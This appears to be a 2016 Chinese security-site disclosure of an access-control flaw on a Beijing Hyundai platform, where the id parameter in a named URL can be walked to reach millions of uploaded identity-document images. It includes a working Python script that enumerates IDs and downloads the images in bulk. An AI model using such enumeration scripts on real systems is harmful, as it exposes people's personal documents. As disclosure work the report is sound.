频道栏目
首页 > 安全 > 企业安全 > 正文

北京现代某平台可越权遍历所有用户上传证件

2016-06-30 09:07:20           
收藏   我要投稿

mark

越权链接:

http://zhihuan.xd2sc.com/CarExapp/imagelist.aspx?id=1400012

ID处可遍历

 

QQ截图20160623223236.png

 

 

QQ截图20160623220143.png

 

测试了ID从1400000开始一直到5431133都还有数据,几百万的证件信息。

写了个批量脚本,随机找了100个id检测下

#!/usr/bin/env python

#-*- coding:utf-8 -*-

import urllib

import re

def getImg(id):

url = "http://zhihuan.xd2sc.com/CarExapp/imagelist.aspx?id=%s" %id

resp = urllib.urlopen(url)

imgurl = re.search(r'src = "(.*?)"', resp.read())

if imgurl.group(1) == "":

pass

else:

imgurl = "http://zhihuan.xd2sc.com/CarExapp/"+imgurl.group(1)

img = urllib.urlopen(imgurl).read()

with open(str(id)+".jpg",'wb') as fs:

fs.write(img)

if __name__ == '__main__':

for i in range(5000000,5000100):

getImg(i)

 

QQ截图20160623224439.png

 

解决方案:

控制权限

上一篇:完美Bypass云锁最新版(V2.2.121)SQL注入防护规则(可UNION)
下一篇:映客某处信息泄露多个数据库服务器沦陷
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站